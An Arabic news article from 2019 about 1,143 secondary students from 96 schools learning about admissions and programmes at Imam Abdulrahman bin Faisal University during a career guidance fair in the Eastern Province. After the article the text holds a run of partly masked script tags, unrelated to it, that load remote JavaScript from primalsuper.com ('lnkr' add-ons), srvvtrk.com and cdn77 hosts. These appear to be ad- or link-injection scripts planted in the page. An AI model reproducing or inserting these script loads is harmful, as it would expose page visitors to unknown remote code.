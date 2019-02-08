شكرا لقرائتكم خبر عن تعريف طلاب 96 مدرسة بتخصصات جامعة الإمام عبد الرحمن والان نبدء بالتفاصيل

تعرف 1143 طالبا وطالبة من 96 مدرسة ثانوية للبنين والبنات في المرحلة الثانوية بالمنطقة الشرقية على آلية القبول والبرامج والتخصصات العامة بجامعة الإمام عبد الرحمن بن فيصل، وذلك داخل جناحها في معرض الإرشاد التعليمي والمهني على مستوى الشرقية، الذي نظمته إدارة التوجيه والإرشاد بتعليم المنطقة بالتعاون مع مركز الأمير سلطان للعلوم والتقنية «سايتك» واختتم فعالياته أمس الأول.

وقال عميد عمادة القبول والتسجيل بالجامعة د.صالح الراشد إن المعرض استمر 5 أيام واستهدف التعريف بمسارات وتخصصات الجامعة، وتم خلاله تخصيص ثلاثة أيام للطالبات ويومين للطلاب، قدمت فيها عمادة القبول والتسجيل من خلال ركنها جملة من المعلومات التي تهم طلاب وطالبات الثانوية العامة من خلال العروض المرئية والمطويات، وتعريفا بوسائل التواصل الاجتماعي المعتمدة للعمادة والجامعة، وتأكيد الزوار على أن يستقصوا المعلومات من مصادرها الموثوقة.

ونوه بحرص العمادة على الوصول وتوسيع دائرة المعرفة للطلبة والطالبات، إضافة لاستضافة الطلبة في لقاء كيف تختار تخصصك الجامعي الذي خصص يوم غد السبت للطالبات، والأحد للطلاب، بقاعة المؤتمرات داخل الحرم الجامعي بالجامعة. ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_339759822&key=1fd3b038f796d0b159&cv=1549549404&t=1549549404285" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_965220737&key=1fd3b038f796d0b159&cv=24291&t=1549549404285" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549549404289" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********